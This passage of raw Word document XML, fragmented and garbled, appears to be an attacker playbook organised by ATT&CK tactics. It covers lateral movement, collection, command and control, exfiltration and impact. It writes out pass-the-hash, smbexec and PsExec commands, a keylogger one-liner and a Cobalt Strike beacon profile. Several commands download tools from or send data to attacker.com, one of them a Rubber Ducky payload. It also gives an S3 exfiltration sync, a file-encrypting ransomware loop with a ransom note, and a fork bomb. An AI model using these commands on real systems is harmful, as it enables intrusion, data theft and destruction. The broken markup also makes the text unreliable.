    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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sekurlsa::pth /user:Admin /domain:corp /ntlm:&lt;hash&gt; /run:"mstsc.exe /v:10.0.0.2"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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SMB Exec (Impacket):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Fonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76CA1D0E" wp14:editId="2AAAEF46">
            <wp:extent cx="4372585" cy="3143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E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51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Run commands via SMB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51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python smbexec.py corp/Admin@10.0.0.2 -hashes :&lt;hash&gt;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2: T1072 – Software Deployment Tools (SCCM, Ansible)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Abuse admin tools to push malware.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lastRenderedPageBreak/>
        <w:t>Procedure 1 – SCCM Malicious Package:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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 xml:space="preserve">Create a "Software Update" package with </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>malware.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the installer.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Ansible Playbook Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15251C4C" wp14:editId="5E0A0D33">
            <wp:extent cx="4620270" cy="1095528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3: T1570 – Lateral Tool Transfer (PsExec, WMI)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Copy/execute tools remotely.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PsExec:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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Execute malware on a remote host:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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PsExec.exe \\10.0.0.2 -u Admin -p P@ssw0rd -d -c malware.exe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WMI Command Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54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Invoke-WmiMethod -ComputerName 10.0.0.2 -Class Win32_Process -Name Create -ArgumentList "malware.exe"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Summary of Flow for Lateral Movement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732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T1021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Pass-the-Hash to RDP into 10.0.0.2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T1072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Push malware via SCCM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T1570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Use PsExec to execute payload on 10.0.0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Controls multiple systems in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:r w:rsidRPr="002D1884">
        <w:pict>
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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10. Tactic: Collection (TA0009)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gather valuable data (files, emails, credentials).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lastRenderedPageBreak/>
        <w:t>Technique 1: T1119 – Automated Collection (Scripts, Tools)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Mass-extract data using scripts.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Batch File to Collect Documents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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for /r C:\Users\ %%f in (*.doc, *.pdf, *.xls) do copy "%%f" C:\Temp\Exfil\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PowerShell Data Harvesting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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Export Outlook emails:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56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Add-Type -Assembly "Microsoft.Office.Interop.Outlook"; $outlook = New-Object -ComObject Outlook.Application; $emails = $outlook.Session.GetDefaultFolder(6).Items | Select Subject, Body | Export-Csv C:\Temp\emails.csv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2: T1213 – Data from Information Repositories (Confluence, SharePoint)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Query databases or cloud storage.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SharePoint API Dump:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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PowerShell to list all files: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64CCD74B" wp14:editId="212962BD">
            <wp:extent cx="5943600" cy="6134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884">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Procedure 2 – SQL Database Export:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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Dump tables via sqlcmd:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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sqlcmd -S 10.0.0.5 -U sa -P Password123 -Q "SELECT * FROM Customers" -o C:\Temp\customers.txt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3: T1005 – Data from Local System (Keylogging, Screenshots)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Capture user activity.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Keylogger (Python):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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Log keystrokes to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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import keyboard; keyboard.hook(lambda e: open("keys.txt", "a").write(e.name))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Screenshot Capture:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60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PowerShell to take screenshots every 5 minutes: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Fonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0440BF2A" wp14:editId="42F26974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943600" cy="39814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884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3CF291E0" wp14:editId="40D30170">
            <wp:extent cx="5943600" cy="370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884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EAEEF7" wp14:editId="44DE6C4C">
            <wp:extent cx="5943600" cy="33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884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23ED6F1C" wp14:editId="66CC544B">
            <wp:extent cx="5943600" cy="426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4291"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidTr="002D1884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Action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T1119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Script to copy all .doc files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T1213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Dump SharePoint documents via API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidTr="002D1884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T1005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Deploy keylogger to capture credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltrates sensitive data (documents, emails, DBs).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:r w:rsidRPr="002D1884">
        <w:pict>
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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11. Tactic: Command and Control (TA0011)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Communicate with compromised systems.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1: T1071 – Application Layer Protocol (HTTP/S, DNS)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Blend traffic with normal web traffic.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HTTP Beaconing (C2 Framework):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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Configure Cobalt Strike to beacon every 5 minutes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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http-get {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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   uri "/pixel.gif";  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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   client { header "User-Agent" "Mozilla/5.0"; }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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}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DNS Tunneling (iodine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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Exfiltrate data via DNS queries:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62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iodine -f -P P@ssw0rd attacker.com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2: T1105 – Ingress Tool Transfer (Download Malware)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Fetch additional tools post-compromise.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lastRenderedPageBreak/>
        <w:t>Procedure 1 – PowerShell Download:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63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Invoke-WebRequest -Uri http://attacker.com/mimikatz.exe -OutFile C:\Temp\mimi.exe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Certutil Download (Living-off-the-Land):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64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Windows built-in tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64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certutil -urlcache -split -f http://attacker.com/nc.exe nc.exe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3: T1090 – Proxy (TOR, VPN, Cloud)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Hide C2 traffic.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TOR Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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Route traffic via TOR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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torsocks curl http://attacker.com/c2.php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Cloud Proxy (AWS Lambda):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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Lambda as a relay:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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import requests; requests.post("https://attacker.com/c2", data=open("/etc/passwd").read())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Summary of Flow for Command and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5531"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidTr="00BF2273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Action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T1071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Beacon via HTTP requests to attacker.com/pixel.gif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T1105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Download Mimikatz to C:\Temp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T1090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Route exfiltration via TOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:bookmarkStart w:id="1" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="1"/>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maintains stealthy communication with implants.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:r w:rsidRPr="002D1884">
        <w:pict>
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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12. Tactic: Exfiltration (TA0010)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steal data from the network.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1: T1041 – Exfiltration Over C2 Channel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Send data through existing C2 paths.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lastRenderedPageBreak/>
        <w:t>Procedure 1 – HTTP POST Data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67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PowerShell to exfil:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="00BF2273" w:rsidP="002D1884">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2273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1202F271" wp14:editId="4A3954C6">
            <wp:extent cx="5943600" cy="610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884" w:rsidRPr="002D1884">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Procedure 2 – DNS Exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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Encode data in DNS queries:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="00BF2273" w:rsidP="00BF2273">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2273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21D96303" wp14:editId="545B326E">
            <wp:extent cx="5553850" cy="457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2: T1020 – Automated Exfiltration (Scheduled Transfers)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Automate data theft.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Scheduled FTP Upload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Create a batch script (exfil.bat):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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ftp -s:commands.txt attacker.com  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF2273" w:rsidRDefault="00BF2273" w:rsidP="002D1884">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2273">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67DC42F1" wp14:editId="08011788">
            <wp:extent cx="2254102" cy="914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63405" cy="91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Cloud Sync (AWS S3):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70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Sync files to attacker-controlled S3 bucket:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70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aws s3 sync C:\Data\ s3://exfil-bucket/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3: T1052 – Exfiltration Over Physical Medium (USB)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Manual data transfer.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USB Drop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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robocopy to copy files to USB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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robocopy C:\Data\ E:\ /mir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HID Attacks (Rubber Ducky):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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Script a USB device to auto-exfiltrate:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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DELAY 1000  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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lastRenderedPageBreak/>
        <w:t xml:space="preserve">STRING powershell -c "Compress-Archive -Path C:\Data\* -DestinationPath C:\Temp\data.zip; Invoke-WebRequest -Uri http://attacker.com/upload -Method POST -InFile C:\Temp\data.zip"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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ENTER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Summary of Flow for Exfiltration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344"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidTr="00BF2273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Action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T1041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POST data.zip to attacker.com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T1020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Schedule nightly FTP uploads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T1052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Use USB to steal files offline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successfully extracts sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:r w:rsidRPr="002D1884">
        <w:pict>
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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13. Tactic: Impact (TA0040)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disrupt, destroy, or manipulate systems.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1: T1486 – Data Encrypted for Impact (Ransomware)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Deploy ransomware.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LockBit-Style Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73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Use PowerShell to encrypt files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73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Get-ChildItem -Path C:\ -Recurse -Include *.doc,*.pdf,*.xls | ForEach-Object { openssl enc -aes-256-cbc -salt -in $_ -out $_.enc -k P@ssw0rd }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Ransom Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74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Drop README.txt:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>Your files are encrypted. Pay 10 BTC to [address].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2: T1499 – Endpoint Denial of Service (Crash Systems)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Overload systems.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Fork Bomb (Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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:(){ :|:&amp; };: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BSOD (Windows):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
